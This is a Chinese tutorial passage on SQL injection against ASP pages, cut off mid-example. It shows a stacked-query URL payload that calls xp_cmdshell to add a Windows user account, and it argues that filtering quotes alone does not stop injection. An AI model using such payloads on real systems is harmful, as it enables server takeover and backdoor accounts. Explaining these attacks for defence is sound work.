包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%